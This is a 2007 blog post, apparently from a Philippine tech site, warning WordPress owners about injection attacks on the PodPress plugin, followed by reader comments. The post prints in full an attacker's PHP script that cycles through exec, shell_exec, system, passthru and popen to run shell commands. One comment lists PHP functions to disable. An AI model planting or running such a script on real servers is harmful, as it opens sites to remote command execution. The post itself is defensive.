YugaTech | Philippines, Technology News & Reviews

Philippines, Technology News & Reviews



Hack attack in progress

One of the ugliest thing that could happen to a blog or a website is getting hacked. For a person like me who runs his own dedicated server, this is a daily pain in the neck. We get hack attacks everyday, some by expert hackers but mostly script kiddies who take some scripts laying around somewhere and try to inject malicious codes into your site hoping to get access.

Since Friday, my blog has been targeted incessantly. You could be next! (Or you’ve already been, you just don’t know it yet.) So be wary.

One of the first signs of hacks attempts can be detected thru your error_logs. They’re usually found on the root folder of your site or the base directory of your blog. What they usually do is affix a script in your URL hoping to execute it. Here’s one script I found being injected to my PodPress plugin:


echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Several people have encountered the same and have been successfully hacked. The script is uploaded somewhere else and being pulled up from the target site. Your error logs might display this as such:

[30-Jul-2007 08:17:57] PHP Warning: parse_url + the URL it’s testing for holes or vulnerabilities.

So, be careful. Always check your files for open permissions (+777) and fix them. Upgrade to the latest stable version of WordPress or any software you’re using. Check all your plugins if they need upgrades too. It’s usually the plugins (that we don’t bother to check) where we least expect them to attack.

permalink

Enter your email address:

Related Entries:


    17 Responses to “Hack attack in progress”


    Pages: [2] 1 » Show All
    1. Gravatar Icon 17 Teenburg Apr 21st, 2008 at 10:09 pm

      i’m use WP Security Scan 2.2.56.49 plugin

    2. Gravatar Icon 16 henryc Dec 25th, 2007 at 5:02 pm

      I think auction.ph hae problem right now specially the One Peso auction fever of auction.ph since December 24,2007 4:00 pm event… right now the 3 auction.ph One Peso auction.ph no one can bid..

      December 25,2007 10:00 Am MAGIC SING
      2:00 pm LCD MONITOR
      4:00 PM OLYMPUS FE-270 DIGITAL CAMERA

    3. Gravatar Icon 15 Bob Maguire Aug 1st, 2007 at 12:49 pm

      Just wanted to add a bit more. It wasn’t Wordpress or my blog that was hacked, but a different 3rd-party PHP app on a different server, just in case that wasn’t totally clear.

      For my particular hack, permissions wouldn’t have helped much as it essentially gave them as much rights as the web server process itself (which was not root, but enough to create zombies or other web-based daemons). What actually saved me was the server runs on a PPC and not X86 platform, so most of their executables they tried to upload didn’t work.

      And whether it’s PHP, ASP, JSP, or whatever, the message is still the same. Anytime to use stuff from a third-party, you’re opening yourself to potential vulnerabilities.

      Mine’s been closed for a while now, but it sure hasn’t stopped them from still trying. :)

    4. Gravatar Icon 14 wites Jul 31st, 2007 at 11:17 am

      since wordpress is built under php, there’s more to it than just upgrading to the latest version. one way of securing your blog or any websites that run php should check their php config (php.ini) for “disable_functions”

      here are some of the commonly abused php functions that should be disabled

      show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen

      but be warned that some client web scripts may break with some of these functions disabled.

    5. Gravatar Icon 13 Michael Russell Jul 31st, 2007 at 2:37 am

      Thanks for the link!

      Fortunately, I wasn’t hacked. A PHP hack doesn’t do much if your site is running ASP.NET. ;)

    6. Gravatar Icon 12 eric Jul 31st, 2007 at 12:09 am

      hay nakakatakot naman…

      boss abe, pwede makapa upgrade ng WP ko. pag di ka na busy.

      thanks!

    7. Gravatar Icon 11 Jaypee Jul 30th, 2007 at 10:58 pm

      A lot of blogs have been defaced recently. One notable site that was recently hacked was CSS Remix.

      That’s why it’s always advisable to have a backup of your DB offline in case of emergency.

      Good luck with the hack attacks! :D

    Pages: [2] 1 » Show All

    Leave a Reply




    Technology & Computers - Top Blogs Philippines hit counter
    How to Get to Google fast